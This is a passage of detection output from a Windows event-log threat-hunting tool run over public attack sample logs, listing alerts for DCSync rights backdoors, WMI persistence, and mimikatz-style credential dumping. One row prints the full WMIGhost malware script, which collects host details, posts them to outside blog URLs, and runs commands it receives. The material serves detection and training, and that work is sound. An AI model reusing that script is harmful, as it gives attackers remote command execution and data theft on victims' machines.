Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.026 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.026 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.026 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-25 21:28:45.026 +00:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-04-03 18:11:54.098 +00:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\user01\Desktop\WMIGhost.exe"" | Process: C:\Users\user01\Desktop\WMIGhost.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xaaf2b | PID: 3328 | PGUID: 365ABB72-F76A-5CA4-0000-0010FA0D1700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-03 18:11:54.098 +00:00,PC04.example.corp,1,low,Exec,Process Start From Suspicious 
Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-03 18:11:54.178 +00:00,PC04.example.corp,20,info,,WMI Event Consumer Activity,"Modified | Type: Script | Name: ""ProbeScriptFint"" | Dst: ""var sXmlUrl=\""http://kumardeep.sosblogs.com/The-first-blog-b1/RSS-b1-rss2-posts.htm;http://blogs.rediff.com/anilchopra/feed/;http://www.blogster.com/kapoorsunil09/profile/rss\"";var sOwner='XDD';var MAIN=function(){$=this;$.key='W';$.sFeedUrl=sXmlUrl;$.sOwner=sOwner;$.sXmlUrl='';$.oHttp=null;$.oShell=null;$.oStream=null;$.sHostName=null;$.sOSType=null;$.sMacAddress=null;$.sURLParam=null;$.version='2.0.0';$.runtime=5000;$.oWMI=null;$._x=ActiveXObject;};MAIN.prototype={InitObjects:function(){$.oWMI=GetObject('winmgmts:{impersonationLevel=impersonate}!\\\\\\\\.\\\\root\\\\cimv2');$.oShell=new $._x('WScript.Shell');$.oStream=new $._x('ADODB.Stream');$.GetOSInfo();$.GetMacAddress();$.GenerateUrlParam();},WMI:function(sql){return $.oWMI.ExecQuery(sql);},GetOSInfo:function(){var e=new Enumerator($.WMI('Select * from Win32_OperatingSystem'));if(!e.atEnd()){var item=e.item();$.sOSType=item.Caption+item.ServicePackMajorVersion;$.sHostName=item.CSName;}},GetMacAddress:function(){var e=new Enumerator($.WMI('Select * from Win32_NetworkAdapter where PNPDeviceID like \\\""%PCI%\\\"" and NetConnectionStatus=2'));if(!e.atEnd()){$.sMacAddress=e.item().MACAddress;}},GenerateUrlParam:function(){var time=new Date();$.sURLParam='cstype=server&authname=servername&authpass=serverpass&hostname='+$.sHostName+'&ostype='+$.sOSType+'&macaddr='+$.sMacAddress+'&owner='+$.sOwner+'&version='+$.version+'&runtime='+$.runtime;$.sURLParam+='&t='+time.getMinutes()+time.getSeconds();},CleanObjects:function(){$.oShell=null;$.oStream=null;var e=new Enumerator($.WMI('Select * from Win32_Process where 
Name=\\\""scrcons.exe\\\""'));while(!e.atEnd()){e.item().terminate();e.moveNext();}},Decode:function(sourceStr){var keycode=sourceStr.charCodeAt(0);var source=sourceStr.substr(1);var vals=source.split(',');var result='';for(var i=0;i@(.*)@<\\/title>+/g;var titleList=response.match(re);for(var i=0;i0){$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam);var response=$.oHttp.ResponseText.replace(/(^\\s*)|(\\s*$)/g,'');if(response.length>0){var commands=null;var container;try{oXml.loadXML(response);container=oXml.getElementsByTagName('div');for(var i=0;i0){commandresult+=',';}commandresult+='\\''+commands[i].id+'\\':\\''+escape(result)+'\\'';}if(commandresult.length>0){commandresult='{'+commandresult+'}';$.oHttp.Open('POST',$.sXmlUrl,false);$.oHttp.setRequestHeader('CONTENT-TYPE','application/x-www-form-urlencoded');$.oHttp.Send($.sURLParam+'&command=result&commandresult='+commandresult);}}else{$.sXmlUrl='';runnum=0;}}$.runtime=(new Date()).getTime()-start.getTime();WScript.Sleep(10000);}if($.sXmlUrl.length>0){return;}}}catch(e){}}},Fire:function(){$.InitObjects();try{$.MainLoop();}catch(e){}$.CleanObjects();}};new MAIN().Fire();"" | User: PC04\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-03 18:11:54.178 +00:00,PC04.example.corp,20,high,Exec,Suspicious Scripting in a WMI Consumer,,rules/sigma/wmi_event/sysmon_wmi_susp_scripting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-03 18:11:54.198 +00:00,PC04.example.corp,21,info,,WMI Event Consumer To Filter Activity,"Modified | Consumer: ""\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\""ProbeScriptFint\"""" | Filter: 
""\\\\.\\root\\subscription:__EventFilter.Name=\""ProbeScriptFint\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-03 18:12:00.016 +00:00,PC04.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\scrcons.exe -Embedding | Process: C:\Windows\System32\wbem\scrcons.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 2636 | PGUID: 365ABB72-F76F-5CA4-0000-0010AA201700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-03 18:12:00.016 +00:00,PC04.example.corp,1,high,Persis | PrivEsc,WMI Persistence - Script Event Consumer,,rules/sigma/process_creation_sysmon/proc_creation_win_wmi_persistence_script_event_consumer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-18 16:55:37.014 +00:00,IEWIN7,16,info,,Sysmon Config Change,C:\Users\IEUser\Desktop\Sysmon.exe -i,rules/hayabusa/sysmon/events/16_SysmonConfigChange.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:37.014 +00:00,IEWIN7,16,medium,Evas,Sysmon Configuration Change,,rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:37.115 +00:00,IEWIN7,4,info,,Sysmon Service State Changed,State: Started | SchemaVersion: 4.20,rules/hayabusa/sysmon/events/4_SysmonServiceStateChanged.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:37.125 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3192 | PGUID: 
365ABB72-AC09-5CB8-0000-0010939A0700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:37.125 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 3232 | PGUID: 365ABB72-AC09-5CB8-0000-0010999C0700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:38.076 +00:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\Sysmon.exe | PID: 2000 | PGUID: 365ABB72-AC06-5CB8-0000-001059830700,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:44.045 +00:00,IEWIN7,1,info,,Process Created,"Cmd: sysmon -c sysmonconfig-18-apr-2019.xml | Process: C:\Users\IEUser\Desktop\Sysmon.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xca21 | PID: 3252 | PGUID: 365ABB72-AC10-5CB8-0000-001047A40700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:44.045 +00:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:44.135 +00:00,IEWIN7,16,info,,Sysmon Config Change,C:\Users\IEUser\Desktop\sysmonconfig-18-apr-2019.xml,rules/hayabusa/sysmon/events/16_SysmonConfigChange.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:44.135 
+00:00,IEWIN7,16,medium,Evas,Sysmon Configuration Change,,rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:44.145 +00:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\Sysmon.exe | PID: 3252 | PGUID: 365ABB72-AC10-5CB8-0000-001047A40700,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:51.275 +00:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:51.275 +00:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:51.275 +00:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx 
+2019-04-18 16:55:51.285 +00:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:56:08.370 +00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: Powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xca21 | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:56:08.370 +00:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:56:24.893 +00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: Powershell | LID: 0xca21 | PID: 3576 | PGUID: 365ABB72-AC38-5CB8-0000-0010365E0800 | Hash: 
SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:56:24.893 +00:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:56:24.893 +00:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:57:04.681 +00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\eventvwr.exe"" | LID: 0xca21 | PID: 3900 | PGUID: 365ABB72-AC60-5CB8-0000-001037BA0800 | Hash: SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:57:06.954 +00:00,IEWIN7,11,medium,,File Created_Sysmon Alert,undefined | Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 912 | PGUID: 
365ABB72-AB26-5CB8-0000-0010D1AE0000,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:57:52.910 +00:00,IEWIN7,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1031,technique_name=Modify Existing Service | tcp | Src: fe80:0:0:0:80ac:4126:fa58:1b81:49158 (IEWIN7) | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:135 (IEWIN7) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 3900 | PGUID: 365ABB72-AC60-5CB8-0000-001037BA0800",rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:58:12.979 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\cryptdll.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:58:13.389 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\samlib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: 
SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:58:13.650 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\hid.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:58:13.740 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\WinSCard.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1C4EA79DABE347BA378654FD2C6EE51B3C7B2868,MD5=9419ABF3163B6F0E3AD3DD2B381C879F,SHA256=75029AFDB5F8A8F74A63B6C8165E77110E2FBAEC0021A9613035BFFEC646A54E,IMPHASH=C9D7A0D2005B11C675EA66DFAC2C77E9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:58:14.811 +00:00,IEWIN7,10,high,,Process Access_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 
Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 1200 | Src PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Tgt PID: 472 | Tgt PGUID: 365ABB72-29B3-5CB9-0000-001087490000",rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:58:14.811 +00:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:58:14.871 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\vaultcli.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:00:09.977 +00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: Powershell | LID: 0xca21 | PID: 3980 | PGUID: 365ABB72-AD19-5CB8-0000-0010F4F40C00 | Hash: 
SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:00:09.977 +00:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:00:09.977 +00:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:01:34.168 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\cryptdll.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:01:34.448 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\samlib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: 
SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:01:34.659 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\hid.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:01:34.689 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\WinSCard.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1C4EA79DABE347BA378654FD2C6EE51B3C7B2868,MD5=9419ABF3163B6F0E3AD3DD2B381C879F,SHA256=75029AFDB5F8A8F74A63B6C8165E77110E2FBAEC0021A9613035BFFEC646A54E,IMPHASH=C9D7A0D2005B11C675EA66DFAC2C77E9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:01:35.680 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\vaultcli.dll | Process: 
